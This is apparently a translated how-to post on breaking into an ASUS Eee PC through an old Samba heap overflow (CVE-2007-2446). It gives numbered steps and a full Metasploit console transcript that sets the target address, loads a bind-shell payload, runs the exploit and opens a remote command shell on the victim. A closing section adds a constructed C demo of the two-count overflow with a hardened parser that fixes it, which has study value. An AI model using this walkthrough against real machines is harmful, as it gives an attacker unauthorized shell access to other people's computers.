The ASUS Eee PC ships with an old Samba release that has a heap buffer overflow. The exploit module used below, linux/samba/lsa_transnames_heap, targets the overflow in Samba's LSA RPC name-translation code (CVE-2007-2446, fixed in Samba 3.0.25), so an exploit framework such as Metasploit can break into an Eee PC with very little effort.
The procedure on Linux is as follows.
1. Prepare a Linux machine with Ruby installed.
2. Download the Metasploit Framework from http://framework.metasploit.com and install it.
3. Run the msf commands in the attachment: from the msf console, deliver the exploit to the Eee PC and set up a control channel (in the transcript this is a bind shell listening on TCP port 4444 on the Eee PC, so the attacker must be able to reach that port). The module's target numbers are tied to specific Samba builds, so check `show targets` before setting TARGET.
4. Over that channel you can run commands such as uname and control the Eee PC, for example:
uname -a
Linux eeepc-agneshuan 2.6.21.4-eeepc #2 Mon Sep 24 14:09:46 EDT 2007 i686 GNU/Linux
(Attachment: msfconsole commands)
[root@AX-HOST framework-3.1]# ./msfconsole
(Metasploit ASCII-art banner)
=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux
msf > use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.192.6.112
RHOST => 192.192.6.112
msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp
PAYLOAD => linux/x86/shell_bind_tcp
msf exploit(lsa_transnames_heap) > set TARGET 1
TARGET => 1
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] Creating nop sled....
[*] Trying to exploit Samba with address 0x08352000...
[*] Connecting to the SMB service...
[*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.192.6.112[\lsarpc] ...
...
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.192.6.112[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.192.6.66:33929 -> 192.192.6.112:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...
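The module name points at the bug class behind this session: a parser that takes two element counts from the network and uses one of them to size a heap allocation while copying according to the other. The C program below is an added illustration of that pattern and its fix; it is constructed for this page, uses a simplified wire layout (two 32-bit little-endian counts followed by fixed 8-byte entries) rather than Samba's real LSA marshalling, and replaces malloc with a fixed arena so the overflow can be measured instead of corrupting a live heap. The cap MAX_ENTRIES and all function names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed, simplified "trans names" layout (not Samba's real format):
 * u32 num_entries, u32 num_entries2, then num_entries2 entries of 8 bytes. */
#define ENTRY_SIZE 8
#define MAX_ENTRIES 64                       /* hypothetical server-side cap */

/* Simulated heap: the "allocation" is carved from the front of this arena and
 * the bytes after it stand in for a neighbouring heap chunk. With a real
 * allocator the same writes corrupt heap metadata or adjacent objects. */
#define ARENA_SIZE (MAX_ENTRIES * ENTRY_SIZE * 2)
#define NEIGHBOUR_FILL 0xAA
static unsigned char arena[ARENA_SIZE];

static uint32_t rd32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Number of bytes beyond the allocation that no longer hold the fill pattern. */
static int clobbered(size_t alloc_bytes) {
    int n = 0;
    for (size_t i = alloc_bytes; i < ARENA_SIZE; i++)
        if (arena[i] != NEIGHBOUR_FILL) n++;
    return n;
}

/* Vulnerable pattern: allocate by num_entries, copy by num_entries2.
 * Returns bytes of neighbouring memory corrupted (0 = no overflow), -1 on
 * truncated input. */
int parse_trans_names_vulnerable(const unsigned char *buf, size_t len) {
    if (len < 8) return -1;
    uint32_t num_entries  = rd32(buf);
    uint32_t num_entries2 = rd32(buf + 4);
    size_t alloc_bytes = (size_t)num_entries * ENTRY_SIZE;   /* "malloc" size */
    if (alloc_bytes > ARENA_SIZE) return -1;  /* simulation bound only */
    memset(arena, NEIGHBOUR_FILL, ARENA_SIZE);
    const unsigned char *p = buf + 8;
    for (uint32_t i = 0; i < num_entries2; i++) {       /* loop bound != alloc bound */
        if ((size_t)(p - buf) + ENTRY_SIZE > len) return -1;
        size_t off = (size_t)i * ENTRY_SIZE;
        if (off + ENTRY_SIZE > ARENA_SIZE) break;        /* simulation bound only */
        memcpy(arena + off, p, ENTRY_SIZE);              /* overflows once i >= num_entries */
        p += ENTRY_SIZE;
    }
    return clobbered(alloc_bytes);
}

/* Hardened version: the counts must agree, be capped before any
 * multiplication, and be backed by enough input bytes. Returns -1 on reject. */
int parse_trans_names_hardened(const unsigned char *buf, size_t len) {
    if (len < 8) return -1;
    uint32_t num_entries  = rd32(buf);
    uint32_t num_entries2 = rd32(buf + 4);
    if (num_entries != num_entries2) return -1;
    if (num_entries > MAX_ENTRIES) return -1;
    size_t need = (size_t)num_entries * ENTRY_SIZE;
    if (len - 8 < need) return -1;
    memset(arena, NEIGHBOUR_FILL, ARENA_SIZE);
    memcpy(arena, buf + 8, need);
    return clobbered(need);
}

/* Constructed packet: claims alloc_count entries, actually carries copy_count. */
size_t build_packet(unsigned char *out, size_t cap,
                    uint32_t alloc_count, uint32_t copy_count) {
    size_t need = 8 + (size_t)copy_count * ENTRY_SIZE;
    if (need > cap) return 0;
    for (int i = 0; i < 4; i++) {
        out[i]     = (unsigned char)(alloc_count >> (8 * i));
        out[4 + i] = (unsigned char)(copy_count  >> (8 * i));
    }
    memset(out + 8, 0x41, need - 8);                     /* attacker-controlled payload */
    return need;
}

/* Scenario helpers: a malicious packet (2 claimed, 10 carried) and a benign one. */
int demo_vulnerable(void) {
    unsigned char pkt[256];
    size_t n = build_packet(pkt, sizeof pkt, 2, 10);
    return parse_trans_names_vulnerable(pkt, n);
}
int demo_hardened(void) {
    unsigned char pkt[256];
    size_t n = build_packet(pkt, sizeof pkt, 2, 10);
    return parse_trans_names_hardened(pkt, n);
}
int demo_benign(void) {
    unsigned char pkt[256];
    size_t n = build_packet(pkt, sizeof pkt, 4, 4);
    return parse_trans_names_hardened(pkt, n) | parse_trans_names_vulnerable(pkt, n);
}

int main(void) {
    printf("vulnerable parser corrupted %d neighbouring bytes\n", demo_vulnerable());
    printf("hardened parser returned %d (-1 = rejected)\n", demo_hardened());
    printf("benign packet result %d\n", demo_benign());
    return 0;
}
```

The malicious packet claims 2 entries but carries 10: the vulnerable parser sizes its buffer for 16 bytes and then writes 80, corrupting 64 bytes of the neighbouring chunk, which is exactly the kind of heap corruption the Metasploit module turns into code execution. The hardened parser rejects the same packet before touching memory because the two counts disagree.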